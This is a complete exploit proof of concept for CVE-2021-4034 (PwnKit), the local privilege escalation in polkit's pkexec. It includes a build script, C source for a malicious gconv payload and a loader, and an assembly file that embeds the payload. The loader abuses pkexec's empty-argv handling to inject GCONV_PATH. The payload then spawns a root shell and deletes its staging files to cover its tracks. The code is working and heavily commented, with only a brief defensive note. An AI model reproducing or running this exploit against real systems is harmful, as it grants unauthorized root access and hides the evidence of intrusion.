CVE-2021-4034 (pkexec) self contained exploit PoC
CVE-2021-4034 (pkexec) self contained exploit PoC |
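#!/bin/bash
# Build the CVE-2021-4034 PoC in two steps, in this order:
#   1. pwnkit.so  - the payload shared object (pwnkit.c without -DLOADER)
#   2. pwnkit     - the loader (pwnkit.c with -DLOADER) plus pwnkit.S, which
#                   pulls the freshly built pwnkit.so in with .incbin
# Stop at the first failing step: a failed step 1 must not let step 2 embed
# a stale or missing pwnkit.so.
set -euo pipefail

# .incbin resolves "pwnkit.so" relative to the assembler's cwd, so build
# from the directory that holds the sources no matter where we were invoked.
cd "$(dirname "$0")"

# The payload is dlopen()ed by glibc's gconv machinery, so it must be
# position independent; toolchains that default to -fPIE (not -fPIC) need
# the flag spelled out for a shared object.
gcc -fPIC -shared -o pwnkit.so pwnkit.c
strip -s pwnkit.so

gcc -DLOADER -o pwnkit pwnkit.c pwnkit.S
strip -s pwnkit

# The blob now lives inside ./pwnkit; the loose copy is no longer needed.
rm pwnkit.so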
/**
 * @file pwnkit.c
 * @author Smx (smxdev4@gmail.com)
 * @brief
 * CVE-2021-4034 (pkexec) self contained exploit PoC
 * Implementation of the Qualys paper
 * @note Local privilege escalation against polkit's pkexec when it is
 * started with an empty argv; fixed by the January 2022 polkit patch, so
 * this only works against unpatched pkexec. One source, built twice: the
 * payload shared object (no -DLOADER) and the loader (-DLOADER), with
 * pwnkit.S embedding the built payload. For authorized testing only.
 * @version 0.1
 * @date 2022-01-26
 * @copyright Copyright (c) 2022
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <fcntl.h>
#include <libgen.h>
#include <linux/limits.h>
#include <spawn.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
/*
 * Conversion entry point that glibc expects every gconv module to export.
 * It never converts anything: by the time glibc gets here the shared object
 * has already been dlopen()ed and the constructor (the actual payload) has
 * run. The fixed status 4 appears to be __GCONV_EMPTY_INPUT in glibc's
 * gconv.h (TODO confirm against the target glibc); any non-success status
 * serves, since nothing downstream of this call matters.
 */
int gconv (void *step,
           void *data,
           const unsigned char **inptrp,
           const unsigned char *inend,
           unsigned char **outbufstart, size_t *irreversible,
           int do_flush, int consume_incomplete)
{
	/* All arguments are intentionally ignored; keep -Wunused-parameter quiet. */
	(void)step;
	(void)data;
	(void)inptrp;
	(void)inend;
	(void)outbufstart;
	(void)irreversible;
	(void)do_flush;
	(void)consume_incomplete;

	static const int stub_status = 4;
	return stub_status;
}
/*
 * gconv module initialisation hook, called by glibc right after the module
 * is dlopen()ed (by which point the ELF constructor has already fired).
 * There is no state to set up; returning 0 tells glibc the module is usable.
 * The argument is presumably the glibc step descriptor; it is irrelevant here.
 */
int gconv_init (void *ignored)
{
	(void)ignored;
	return 0;
}
/*
 * gconv module teardown hook, the counterpart of gconv_init(). Nothing was
 * allocated, so nothing is released; 0 reports success to glibc.
 */
int gconv_end (void *ignored)
{
	(void)ignored;
	return 0;
}
/* Environment variable glibc's iconv consults for extra gconv module
 * directories. It cannot simply be set by the caller of a setuid program
 * (glibc drops it and pkexec does not pass it through), which is why the
 * loader smuggles it in via pkexec's argv[1] write-back; see main(). */
#define TARGET_VAR "GCONV_PATH"
/* Staging directory, relative to the loader's own directory; also the value
 * GCONV_PATH ends up with once injected ("./gconv"). */
#define TARGET_PREFIX "gconv"
/* Module name used in gconv/gconv-modules; the loader writes the payload as
 * gconv/pwnkit.so so that glibc's lookup of this module lands on it. */
#define TARGET_MODULE "pwnkit"
/* Bogus charset name. CHARSET=PWNKIT forces glibc to search the module
 * directories for a converter no built-in table can provide. */
#define TARGET_CHARSET "PWNKIT"
#ifndef LOADER | |
/*
 * Payload entry point. Runs automatically when glibc dlopen()s pwnkit.so as
 * the "PWNKIT" gconv module inside pkexec, i.e. inside a setuid-root
 * process. Nothing here is ever called explicitly, and none of the calls
 * below check their return values.
 */
__attribute__((constructor))
void ctor(){
	puts("-----------------");
	puts("-- Smx says hi --");
	puts("-----------------");
	/* pkexec is setuid root, so the effective ids are already 0; raising the
	 * real and saved ids as well gives the child shell unambiguous root and
	 * keeps shells that reset euid to ruid on a mismatch from dropping it. */
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);
	/* A minimal, fixed environment: the parent's environment is the one the
	 * loader crafted for the exploit and should not leak into the shell. */
	char *argv[] = {"/bin/sh", NULL};
	char *envp[] = {"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL};
	pid_t pid = 0;
	/* posix_spawn() rather than fork()+exec, presumably so no forked copy of
	 * pkexec ever returns into this module. On failure pid stays 0, and
	 * waitpid(0, ...) below then waits on any child of pkexec's process
	 * group rather than on the shell. */
	posix_spawn(&pid, "/bin/sh",
		NULL, NULL,
		argv, envp
	);
	int status = 0;
	/* Block until the interactive shell exits, then tidy up and let pkexec
	 * carry on. */
	waitpid(pid, &status, 0);
	/* Remove the staging files the loader created, under the same relative
	 * names: the cwd is still the loader's directory because pkexec inherited
	 * it. Files first, then the now-empty directories; errors are ignored.
	 * Whatever pkexec itself logged about the rejected environment variable
	 * is outside this cleanup's reach. */
	unlink(TARGET_PREFIX"/"TARGET_MODULE".so");
	unlink(TARGET_VAR"=./"TARGET_PREFIX);
	unlink(TARGET_PREFIX"/gconv-modules");
	rmdir(TARGET_VAR"=.");
	rmdir(TARGET_PREFIX);
}
#endif | |
#ifdef LOADER | |
/* Start/end labels from pwnkit.S bracketing the .incbin'd pwnkit.so. They
 * are labels, not pointer variables: only their ADDRESSES are meaningful
 * (&blob_start, &blob_end), never their "values". `void *` is a fiction
 * kept for compatibility; `extern const unsigned char blob_start[]` would
 * be the honest type. */
extern void *blob_start;
extern void *blob_end;
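/* Create or truncate PATH with MODE (subject to umask) and write LEN bytes
 * of DATA to it, retrying short writes. Returns 0 on success, -1 after
 * reporting the failing call on stderr; the fd is closed either way. */
static int write_file(const char *path, const void *data, size_t len, mode_t mode)
{
	int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, mode);
	if (fd < 0) {
		perror(path);
		return -1;
	}
	const unsigned char *p = data;
	while (len > 0) {
		ssize_t n = write(fd, p, len);
		if (n < 0) {
			perror(path);
			close(fd);
			return -1;
		}
		p += n;
		len -= (size_t)n;
	}
	if (close(fd) != 0) {
		perror(path);
		return -1;
	}
	return 0;
}

/* mkdir(2) that tolerates an already existing directory (a re-run after a
 * failed attempt). Returns 0 on success, -1 after reporting on stderr. */
static int ensure_dir(const char *path, mode_t mode)
{
	if (mkdir(path, mode) == 0 || errno == EEXIST) {
		return 0;
	}
	perror(path);
	return -1;
}

/*
 * Loader (built with -DLOADER). Stages the on-disk layout pkexec needs and
 * then execs pkexec with an EMPTY argv, which is the CVE-2021-4034 trigger
 * described in the Qualys advisory this file implements:
 *
 *   With argc == 0, pkexec still reads argv[1] -- which is really envp[0] --
 *   as the program to run, resolves it through PATH and writes the result
 *   back into argv[1], i.e. into envp[0]. envp[0] is "gconv" and PATH is the
 *   directory literally named "GCONV_PATH=.", so the write-back turns
 *   envp[0] into "GCONV_PATH=./gconv": a variable glibc would never accept
 *   from the caller of a setuid program.
 *
 * Files created next to this binary (the cwd is switched there first so every
 * relative name below, and in the payload's cleanup, resolves the same way):
 *
 *   GCONV_PATH=./gconv     empty, executable: what the PATH search for
 *                          "gconv" finds
 *   gconv/pwnkit.so        the payload, dumped from the embedded blob
 *   gconv/gconv-modules    maps charset PWNKIT <-> INTERNAL onto module
 *                          "pwnkit", i.e. gconv/pwnkit.so
 *
 * Trigger: CHARSET=PWNKIT makes glibc look for a converter for the bogus
 * charset the first time pkexec prints a localized message; XAUTHORITY=../
 * contains "..", which pkexec's environment validation rejects by printing
 * such a message. glibc consults GCONV_PATH, dlopen()s pwnkit.so, and its
 * constructor runs inside the setuid-root process.
 *
 * Defensive note: pkexec logs the rejected variable via syslog before it
 * prints, and a directory named "GCONV_PATH=." is itself a strong indicator;
 * the payload's cleanup removes the files, not the log line. Patched polkit
 * (January 2022) refuses to run with argc < 1.
 *
 * Changes from the original: readlink() output is NUL-terminated (readlink
 * never terminates the buffer, so dirname() on the raw buffer was undefined
 * behaviour), every syscall result is checked, and the payload's fd is
 * closed rather than leaked into pkexec across execve().
 *
 * argc/argv are ignored. Returns 1 on any staging failure or if execve()
 * returns; does not return on success.
 */
int main(int argc, char *argv[]){
	(void)argc;
	(void)argv;

	/* Locate ourselves and cd there; the staging names below are relative,
	 * and the payload later unlinks them from the cwd pkexec inherits. */
	char self[PATH_MAX];
	ssize_t len = readlink("/proc/self/exe", self, sizeof(self) - 1);
	if (len < 0) {
		perror("readlink");
		return 1;
	}
	self[len] = '\0';	/* readlink() does not NUL-terminate */
	if (chdir(dirname(self)) != 0) {
		perror("chdir");
		return 1;
	}

	/* "GCONV_PATH=." must be a directory so it can be the single PATH entry;
	 * the file "GCONV_PATH=./gconv" inside it is what the search will hit. */
	if (ensure_dir(TARGET_VAR"=.", 0755) != 0) {
		return 1;
	}
	if (ensure_dir(TARGET_PREFIX, 0755) != 0) {
		return 1;
	}

	/* Payload: the bytes between the two labels provided by pwnkit.S. */
	const unsigned char *blob = (const unsigned char *)&blob_start;
	size_t blob_len = (uintptr_t)&blob_end - (uintptr_t)&blob_start;
	if (write_file(TARGET_PREFIX"/"TARGET_MODULE".so", blob, blob_len, 0777) != 0) {
		return 1;
	}

	/* Empty file; only its name and execute bit (0777 minus umask) matter. */
	if (write_file(TARGET_VAR"=./"TARGET_PREFIX, "", 0, 0777) != 0) {
		return 1;
	}

	/* gconv-modules syntax: "module FROM TO FILE COST". Both directions are
	 * listed so whichever one glibc looks up resolves to module "pwnkit". */
	static const char conf[] =
		"module "TARGET_CHARSET"// INTERNAL "TARGET_MODULE" 1\n"
		"module INTERNAL "TARGET_CHARSET"// "TARGET_MODULE" 1\n"
		;
	if (write_file(TARGET_PREFIX"/gconv-modules", conf, sizeof(conf) - 1, 0777) != 0) {
		return 1;
	}

	/* argv with argc == 0 is the bug; envp[0] is what pkexec reads as
	 * argv[1]. See the header comment for how each entry is used. */
	char *args[] = {NULL};
	char *env[] = {
		TARGET_PREFIX,			/* read as argv[1]: program "gconv" */
		"PATH="TARGET_VAR"=.",		/* PATH search yields "GCONV_PATH=./gconv" */
		"CHARSET="TARGET_CHARSET,	/* forces a lookup of charset PWNKIT */
		"XAUTHORITY=../",		/* ".." fails validation -> error message */
		NULL
	};
	execve("/usr/bin/pkexec", args, env);

	/* Only reached if execve() failed (e.g. pkexec not installed). */
	perror("execve");
	return 1;
}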
#endif |
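/*
 * Embeds the already-built pwnkit.so (the payload) into the loader binary.
 * pwnkit.c declares blob_start/blob_end as externs and writes the bytes
 * between them back out to disk at run time; only the two addresses matter.
 * .incbin resolves "pwnkit.so" relative to the assembler's cwd (or -I), so
 * assemble from the directory that holds it.
 *
 * Changes from the original: the blob goes in .rodata, not .data -- it is
 * only ever read, so it needs no writable mapping. The .note.GNU-stack line
 * tells the linker this object does not need an executable stack; without
 * it GNU ld assumes a hand-written assembly object does (or, on newer
 * binutils, warns about it), and the whole loader gets an RWX stack.
 * "@progbits" is the x86 spelling; ARM targets use "%progbits".
 */
	.section .note.GNU-stack,"",@progbits

	.section .rodata
	.globl blob_start
	.globl blob_end
blob_start:
	.incbin "pwnkit.so"
blob_end: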